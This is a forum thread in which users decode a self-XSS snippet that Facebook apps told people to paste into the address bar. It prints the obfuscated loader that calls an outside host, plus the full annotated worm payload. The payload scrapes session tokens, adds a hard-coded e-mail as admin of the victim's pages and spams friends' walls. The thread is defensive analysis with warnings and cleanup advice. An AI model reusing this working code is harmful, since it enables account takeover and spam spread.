Can anyone decrypt?


    Can anyone decrypt?

    Some Facebook apps are asking to apply this code in the address bar. Anyone know what it does?

    Code:
    javascript: var _0x9557=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2f\x2f\x67\x61\x6d\x65\x73\x70\x68\x61\x73\x65\x2e\x63\x6f\x6d\x2f\x66\x62\x2f\x62\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);
    mysterio.al - programming is a functional art

    #2
    Originally posted by Mysterio3 View Post
    Some Facebook apps are asking to apply this code in the address bar. Anyone know what it does?

    Code:
    javascript: var _0x9557=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2f\x2f\x67\x61\x6d\x65\x73\x70\x68\x61\x73\x65\x2e\x63\x6f\x6d\x2f\x66\x62\x2f\x62\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);

    Code:
    // Decoded loader. Index map: [0]="src", [1]="script", [2]="createElement", [3]=the script URL, [4]="appendChild", [5]="body".
    // Equivalent to: a = document.createElement("script"); a.src = "//gamesphase.com/fb/b.js"; document.body.appendChild(a);
    // The URL is protocol-relative (starts with //), so it is fetched with the scheme of the page the code is pasted into.
    // The trailing void (0) makes the javascript: URL evaluate to undefined, so the browser stays on the current page.
    javascript: var _0x9557=["src","script","createElement","//gamesphase.com/fb/b.js","appendChild","body"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);
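    It's trying to make a <script> tag with //gamesphase.com/fb/b.js as the source and place it inside the body tag. Since the code is pasted into the address bar of an open Facebook tab, the injected script then runs inside that page, with the logged-in user's session.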

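    These are the contents of gamesphase.com/fb/b.js. I think it checks if the user is a fan of the app's fan page. (That is what its alert message tells the user; the requests it actually sends are described in the comments in the code.)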
    Code:
    // Analyst-annotated copy of the payload that the address-bar loader pulls in (b.js).
    // It runs inside the victim's logged-in Facebook page, so every request below is same-origin
    // and is sent with the victim's session. Visible sequence:
    //   1. show a decoy alert;
    //   2. GET "/" and scrape the post_form_id and fb_dtsg form tokens out of the returned HTML;
    //   3. GET the friends list and pull friend IDs out of the picture file names;
    //   4. once, list the pages the user manages and POST an admin change with a hard-coded address to each;
    //   5. every 2 seconds, up to 25 times, POST a status update targeting a randomly chosen friend.
    // The tokens in step 2 are read from the user's own page, which is why they do not stop
    // a script the user has injected into their own session.
    // Indicators visible in this listing: the promoted page URL in txt/txtee and the
    // address in friendselector_input.
    //These are to be posted as status messages
    // (Albanian; roughly: "Play WHO WANTS TO BE A MILLIONAIRE in Albanian here: <page URL> test your knowledge")
    txt = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
    txtee = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
     
    // Decoy message. Albanian; roughly: "Please wait 10 seconds, we need to check whether you
    // have become a fan. Then click OK to continue." alert() blocks, so nothing below runs until
    // the user dismisses it. No fan check appears anywhere in the code that follows.
    alert("Ju Lutem Prisni 10 sekonda, ne duhet ta kontrollojme nese jeni bere fansa. Pastaj klikoni OK per te vazhduar.");
    // with(x) resolves open / onreadystatechange / send against the XHR object. The statement is one
    // comma chain: open(...), then the handler assignment, then send(null) on the last line of the listing.
    with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange=function () {
    
      if (x.readyState == 4 && x.status == 200) {
      z=x.responseText;
        //comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1];
      //  comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\w]+)"/i)[1];
      // Token scraping: post_form_id is extracted twice with the same regex (form and pfid hold
      // the same value); fb_dtsg goes into dt.
       form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
      dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
     pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
    
     
        // The logged-in account's ID is taken from the c_user cookie and used as the uid parameter.
        with(xx = new XMLHttpRequest())
          open("GET", "/ajax/browser/friends/?uid=" +
                   document.cookie.match(/c_user=(\d+)/)[1] +
                      "&filter=all&__a=1&__d=1"),
          onreadystatechange=function () {
          //extracts list of friends
     
            if (xx.readyState == 4 && xx.status == 200) {
            m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
            //facebook returns list of friends images of the form of three numbers separated by _,
            //the above regular expression extracts out the middle of the two
            //(which in fact is the userID of friend)
            i = 0;
            llimit=25;
            t = setInterval(function () {
              if (i >= llimit )
                return;//cap: after llimit (25) ticks nothing more is sent; the analyst's guess is that this keeps the script under Facebook's bot threshold. t is never passed to clearInterval in this listing, so the timer keeps firing and returning.
              if(i == 0) {//first tick only
                // Fetches the "manage pages" dialog. Both X-Requested* headers are set to null
                // (the purpose is not evident from this listing).
                with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
                     setRequestHeader("X-Requested-With", null),
                     setRequestHeader("X-Requested", null),
                     onreadystatechange=function() {
                  if(ddddd.readyState == 4 && ddddd.status == 200) {
                    // Collects every \"id\":<digits> occurrence in the response; presumably these are
                    // the IDs of the pages the user manages (inferred from the endpoint name).
                    llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;
                    j=0;
                    for(j=0;j<len;j++) {
                      // One POST per collected ID, to /pages/edit/ with sk=admin, carrying the scraped
                      // tokens and a hard-coded, URL-encoded e-mail address in friendselector_input.
                      with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),
                           setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                           send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+
                                "&friendselector_input%5B%5D=fshderri%40gmail.com%09&friend_selected%5B%5D=&save=1");
                           //I am not very sure on this one but it seems it adds as admin of all pages the user holds
                    }
                  }
                }, send(null); //end of function to change the admins
     
                
                    
                      // this one collects cookie as well as the personalized status update email address
                      // (a photo sent to that address is posted on the wall directly)
                      // NOTE(review): no code matching the two comment lines above appears in this listing.
     
                 
                }
              
     
                //following code does status update
                //the code writes message represented by txt and txtee alternately on the wall of friends.
                //txt and txtee are same though (may be author's mistake)
                if(i%2==0)
                {
                  with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                    setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                    send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +
                    "&target_id=" + m[Math.floor(Math.random() * m.length)] +
                    //m is an array of id of friends (was created early in the script exec), choose a random friend
                    "&composer_id=" +
                    "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +
                    //comp, form, dt are (probably) XSRF prevention tokens (comp is only assigned in the commented-out lines above)
                    "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                }
                else
                {
                  // Same request as the branch above, with txtee as the status text.
                  with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                       setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                       send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee +
                            "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+
                            "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +
                            "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                }
                i += 1;
            }, 2000);// timer period: the callback above runs again every 2000 ms
          }
     
        }, send(null);
      }
    }, send(null);
    Last edited by eeeh_aarrh; 07.02.11, 19:41.



      #3
      Thank you! Best answer ;)
      mysterio.al - programming is a functional art



        #4
        excellent reply man!!!!!!.............................

        excellent reply man.....






        Originally posted by eeeh_aarrh View Post
        Code:
        // Decoded loader. Index map: [0]="src", [1]="script", [2]="createElement", [3]=the script URL, [4]="appendChild", [5]="body".
        // Equivalent to: a = document.createElement("script"); a.src = "//gamesphase.com/fb/b.js"; document.body.appendChild(a);
        // The URL is protocol-relative (starts with //), so it is fetched with the scheme of the page the code is pasted into.
        // The trailing void (0) makes the javascript: URL evaluate to undefined, so the browser stays on the current page.
        javascript: var _0x9557=["src","script","createElement","//gamesphase.com/fb/b.js","appendChild","body"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);
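        It's trying to make a <script> tag with //gamesphase.com/fb/b.js as the source and place it inside the body tag. Since the code is pasted into the address bar of an open Facebook tab, the injected script then runs inside that page, with the logged-in user's session.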

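        These are the contents of gamesphase.com/fb/b.js. I think it checks if the user is a fan of the app's fan page. (That is what its alert message tells the user; the requests it actually sends are described in the comments in the code.)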
        Code:
        // Analyst-annotated copy of the payload that the address-bar loader pulls in (b.js).
        // It runs inside the victim's logged-in Facebook page, so every request below is same-origin
        // and is sent with the victim's session. Visible sequence:
        //   1. show a decoy alert;
        //   2. GET "/" and scrape the post_form_id and fb_dtsg form tokens out of the returned HTML;
        //   3. GET the friends list and pull friend IDs out of the picture file names;
        //   4. once, list the pages the user manages and POST an admin change with a hard-coded address to each;
        //   5. every 2 seconds, up to 25 times, POST a status update targeting a randomly chosen friend.
        // The tokens in step 2 are read from the user's own page, which is why they do not stop
        // a script the user has injected into their own session.
        // Indicators visible in this listing: the promoted page URL in txt/txtee and the
        // address in friendselector_input.
        //These are to be posted as status messages
        // (Albanian; roughly: "Play WHO WANTS TO BE A MILLIONAIRE in Albanian here: <page URL> test your knowledge")
        txt = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
        txtee = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
         
        // Decoy message. Albanian; roughly: "Please wait 10 seconds, we need to check whether you
        // have become a fan. Then click OK to continue." alert() blocks, so nothing below runs until
        // the user dismisses it. No fan check appears anywhere in the code that follows.
        alert("Ju Lutem Prisni 10 sekonda, ne duhet ta kontrollojme nese jeni bere fansa. Pastaj klikoni OK per te vazhduar.");
        // with(x) resolves open / onreadystatechange / send against the XHR object. The statement is one
        // comma chain: open(...), then the handler assignment, then send(null) on the last line of the listing.
        with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange=function () {
        
          if (x.readyState == 4 && x.status == 200) {
          z=x.responseText;
            //comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1];
          //  comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\w]+)"/i)[1];
          // Token scraping: post_form_id is extracted twice with the same regex (form and pfid hold
          // the same value); fb_dtsg goes into dt.
           form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
          dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
         pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
        
         
            // The logged-in account's ID is taken from the c_user cookie and used as the uid parameter.
            with(xx = new XMLHttpRequest())
              open("GET", "/ajax/browser/friends/?uid=" +
                       document.cookie.match(/c_user=(\d+)/)[1] +
                          "&filter=all&__a=1&__d=1"),
              onreadystatechange=function () {
              //extracts list of friends
         
                if (xx.readyState == 4 && xx.status == 200) {
                m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
                //facebook returns list of friends images of the form of three numbers separated by _,
                //the above regular expression extracts out the middle of the two
                //(which in fact is the userID of friend)
                i = 0;
                llimit=25;
                t = setInterval(function () {
                  if (i >= llimit )
                    return;//cap: after llimit (25) ticks nothing more is sent; the analyst's guess is that this keeps the script under Facebook's bot threshold. t is never passed to clearInterval in this listing, so the timer keeps firing and returning.
                  if(i == 0) {//first tick only
                    // Fetches the "manage pages" dialog. Both X-Requested* headers are set to null
                    // (the purpose is not evident from this listing).
                    with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
                         setRequestHeader("X-Requested-With", null),
                         setRequestHeader("X-Requested", null),
                         onreadystatechange=function() {
                      if(ddddd.readyState == 4 && ddddd.status == 200) {
                        // Collects every \"id\":<digits> occurrence in the response; presumably these are
                        // the IDs of the pages the user manages (inferred from the endpoint name).
                        llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;
                        j=0;
                        for(j=0;j<len;j++) {
                          // One POST per collected ID, to /pages/edit/ with sk=admin, carrying the scraped
                          // tokens and a hard-coded, URL-encoded e-mail address in friendselector_input.
                          with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),
                               setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                               send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+
                                    "&friendselector_input%5B%5D=fshderri%40gmail.com%09&friend_selected%5B%5D=&save=1");
                               //I am not very sure on this one but it seems it adds as admin of all pages the user holds
                        }
                      }
                    }, send(null); //end of function to change the admins
         
                    
                        
                          // this one collects cookie as well as the personalized status update email address
                          // (a photo sent to that address is posted on the wall directly)
                          // NOTE(review): no code matching the two comment lines above appears in this listing.
         
                     
                    }
                  
         
                    //following code does status update
                    //the code writes message represented by txt and txtee alternately on the wall of friends.
                    //txt and txtee are same though (may be author's mistake)
                    if(i%2==0)
                    {
                      with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                        setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                        send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +
                        "&target_id=" + m[Math.floor(Math.random() * m.length)] +
                        //m is an array of id of friends (was created early in the script exec), choose a random friend
                        "&composer_id=" +
                        "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +
                        //comp, form, dt are (probably) XSRF prevention tokens (comp is only assigned in the commented-out lines above)
                        "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                    }
                    else
                    {
                      // Same request as the branch above, with txtee as the status text.
                      with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                           setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                           send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee +
                                "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+
                                "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +
                                "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
                    }
                    i += 1;
                }, 2000);// timer period: the callback above runs again every 2000 ms
              }
         
            }, send(null);
          }
        }, send(null);



          #5
          It's a profile hack

          eeeh_aarrh is totally correct.
          This is the recent Facebook hack code that has been spreading amazingly fast since January. What it does is create a script tag inside the current user's page and include an external JavaScript file. From that point, the code in that js file sends browser requests and executes commands without the user knowing. It will immediately grant the attacker admin access to all of the victim's pages and will post a link on the walls of random friends of the victim to spread the fake page even more.
          Mr Mysterio you are highly advised NOT to execute this script or any other similar scripts unless you REALLY know what you are doing... Anyone who has already run it should check the admin list of every page they manage and remove any admin they did not add.
          By the way you can see the attacker's email address is fshderri@gmail.com so if you know any black list service, report it.
          P.S.: I tried a similar code just for curiosity, with my email address, and it really works and it's a very clever trick to HACK user's profile and pages.
          DON'T TRY THIS OR YOUR PROFILE IS DEAD!



            #6
            I didn't know it was a facebook hack. LOL. Haven't read the whole code though.
